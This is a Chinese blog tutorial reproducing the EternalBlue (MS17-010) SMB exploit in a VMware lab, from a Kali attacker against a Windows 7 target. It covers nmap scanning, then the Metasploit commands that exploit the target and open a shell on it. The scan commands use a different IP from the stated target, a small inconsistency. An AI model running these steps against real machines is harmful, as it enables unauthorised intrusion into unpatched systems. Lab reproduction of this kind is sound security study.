EternalBlue永恒之蓝漏洞复现(MS17-010)

最新推荐文章于 2024-05-21 16:28:23 发布
最新推荐文章于 2024-05-21 16:28:23 发布
阅读量1k 收藏 10
点赞数 10
文章标签: 安全 网络 web安全 linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65615852/article/details/137692832
版权

19 前言

MS17-010是指微软发布的一个安全公告,其编号为MS17-010,针对的是Windows操作系统中Server Message Block (SMB) 协议的一个严重漏洞。这个漏洞使得攻击者可以远程执行恶意代码,从而获取受感染系统的控制权。MS17-010漏洞也被称为永恒之蓝漏洞(EternalBlue),是由国国家安全局(NSA)开发的工具泄露所致。

这个漏洞于2017年5月份被广泛利用,特别是在“WannaCry”勒索软件攻击中。由于许多用户没有及时安装微软发布的修补程序,导致大量系统被感染,造成了全球范围内的经济损失和数据泄露。

攻击方式

永恒之蓝攻击利用了Windows操作系统中Server Message Block (SMB) 协议的漏洞,主要通过以下方式进行攻击:

  1. 漏洞利用: 攻击者利用永恒之蓝漏洞(MS17-010)来执行恶意代码,通过远程执行代码来获取系统的控制权。

  2. 网络传播: 一旦系统被感染,永恒之蓝可以自动传播到其他易受攻击的系统,利用相同的漏洞进行攻击。这种自动传播使得恶意软件可以迅速在网络中蔓延。

  3. 后门安装: 攻击者可能会在受感染系统中安装后门程序,以便长期控制系统或收集敏感信息。

  4. 勒索软件攻击: 永恒之蓝曾被用于发起全球性的勒索软件攻击,例如WannaCry。攻击者利用漏洞感染大量计算机,并要求受害者支付赎金以解锁其系统或数据。

  5. 其他恶意活动: 永恒之蓝的漏洞利用还可能导致其他类型的恶意活动,如恶意挖矿软件的安装、敏感信息窃取等。

综合来看,永恒之蓝攻击方式多样,利用其漏洞进行远程执行代码和自动传播是其主要特征。

准备工作

攻击机:kali2024.1        

靶机:windos 7

本次复现用到VMware Workstation Pro ,复现全过程都在虚拟机操作环境中实现

首先

确定攻击机和靶机的IP地址

linux 快捷键CTRL ALT + T 打开命令行    
#最好使用root用户登录kali,否则后续可能出现权限不足情况#
ifconfig    #查看ip地址

windos 快捷键win + R打开命令行
ipconfig     #查看ip地址

   由此我们知道了攻击机和靶机的IP

攻击机IP:192.168.223.129       靶机IP:192.168.223.132

下面开始攻击

拿到IP地址后就可以对靶机用nmap进行扫描,看靶机开放了什么端口服务

nmap -v -sV 192.168.137.111     # -v 启用详细模式   -sV 指定 Nmap 应执行版本扫描

扫描结束后会可以看到445/tcp 是open 也就是开启状态,那么我们稍后就可以利用它

        先扫用nmap扫描靶机可能存在的漏洞

nmap --script=vuln 192.168.137.111 -v     

# --script=vuln 此命令Nmap 将运行属于“漏洞”类别的所有可用脚本,对目标主机进行漏洞扫描。
# -v 启用详细模式

在这里我们可以看到 扫描到了ms17-010,那么我们就可以利用漏洞开始攻击

msfconsole     #启动 Metasploit 框架

search ms17-010     #搜索ms17-010漏洞


use 0            #使用编号为0的模块
show options     #显示模块所需的配置选项

 这一步完了后,我们开始设置靶机IP,分配线程

set rhosts 192.168.223.132     #设置靶机ip
set thread 8                   #设置线程的多少(这里我设为8,可以不同)

全部完成后,可以开始攻击 

run     #开始攻击

显示上述这样就是成功了 

shell      #输入shell即可进入靶机

 成功进入靶机

结尾

感谢各位看官,本次的漏洞复现到此就结束啦,今后的路还很长,希望我们一起在学习的路上砥砺前行,实现我们最终的理想!!!

Muokaii
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows漏洞 MS17-010 / EternalBlue永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue永恒之蓝漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
永恒之蓝漏洞复现(ms17-010)
weixin_43913009的博客
04-01 2万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、永恒之蓝(Eternal Blue)二、复现环境三、复现过程1.主机发现2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(Eternal Blue) 永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏.
利用永恒之蓝漏洞(ms17-010)对win7上传勒索病
m0_74402888的博客
04-27 775
攻击机kali:192.168.83.136靶机win7:192.168.83.144。
永恒之蓝 MS17-010漏洞复现
春日野穹
12-21 1288
目录导航 一. 复现环境 二. 漏洞原理 1.漏洞简介 2.漏洞原理代码详解 三. 漏洞复现 1.信息收集 2.漏洞探测 3.漏洞利用 一. 复现环境 工具:msf 攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24 测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243 网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模...
永恒之蓝漏洞ms17-010
weixin_65336001的博客
05-01 1402
什么是永恒之蓝漏洞?利用ms17-010漏洞攻击Windows7复现超细教程
永恒之蓝MS17-010漏洞复现
tubug的博客
05-21 5008
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。.........
永恒之蓝漏洞复现ms17-010
weixin_53730939的博客
01-10 628
永恒之蓝漏洞复现
使用Kali复现永恒之蓝漏洞ms17-010
m0_67463450的博客
01-15 921
永恒之蓝漏洞ms17-010)的简单复现
MS17-010永恒之蓝漏洞分析与复现
热门推荐
未完成的歌~的博客
03-12 5万+
文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块,对靶机进行攻击5、得到靶机shell6、通过shell对靶机进行控制 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露
永恒之蓝漏洞复现(CVE-2017-0146)
qq_58000413的博客
04-03 4603
前言 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 原理分析: 利用ms17-010中的扫描模块和攻击模块进行,首先通过扫描模块判断是否存在永恒之蓝漏洞
漏洞复现 | MS17-010*(永恒之蓝漏洞复现
made_cola的博客
03-24 1296
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞EternalBlue”(永恒之蓝)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
EternalBlue永恒之蓝渗透测试.html
03-02
永恒之蓝漏洞渗透测试
网络攻防之-针对ms17-010脚本(python)
12-23
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,...
用CSharp写的Eternalblue。 包含版本检测,漏洞扫描程序和MS17-010的利用-.NET开发
05-27
C#中的Eternalblue该项目是...为了对此进行测试,我还翻译了一些Metasploits辅助文件/ scanner / smb / smb_ms17_010,这是一个教育项目,旨在帮助自己了解Eternalblue的实际工作原理。 请您自担风险使用,因为我也有
永恒之蓝EternalBlue/Wannacry分析
12-24
永恒之蓝EternalBlue/Wannacry分析
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 136
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
安全+大模型应用系列之RSAC的Dropzone AI的分析
si1ence的博客
05-17 396
从Dropzone AI广泛的认可度来看,国外对该思路的认可度较好,前期在国内项目验证的时候客户也非常感兴趣。但是目前国内的安全产品、安全平台较为封闭、无法像国外产品能够广泛直接对接、或许是当前制约国内的安全GPT广泛推广的一个阻碍; 安全+大模型的产品的逐渐按照多能力的安全专家(全能)的能力和价值去规划、应该是一个受客户认可的正确方向。
Nginx - 安全基线配置与操作指南
小工匠
05-19 911
我们这里主要介绍针对Nginx中间件的安全基线配置指南,包括版本选择、用户创建、权限设置、缓冲区配置、日志管理、访问限制、错误页面处理、并发控制、补丁更新等方面。同时还涵盖了如何配置正向代理模块、防止目录遍历以及服务监控等内容,旨在指导系统管理员确保中间件服务器的安全性本文档规定了中间件服务器应当遵循的安全性设置标准,旨在指导系统管理人员或安全检查人员进行中间件的安全合规性检查和配置。
[图解]SysML和EA建模住宅安全系统-07 to be块定义图
最新发布
rolt的专栏
05-21 657
然后再针对这个画一个块内部图,然后这里再把签名拖上去
ms17-010永恒之蓝漏洞复现与处理
06-06
对于 ms17-010永恒之蓝漏洞复现和处理,需要进行以下几个步骤: 1. 确认系统是否存在漏洞:检查系统是否存在 SMB 服务,如果存在并且版本为 Windows 7、Windows Server 2008 R2 或更高版本,则可能存在该漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值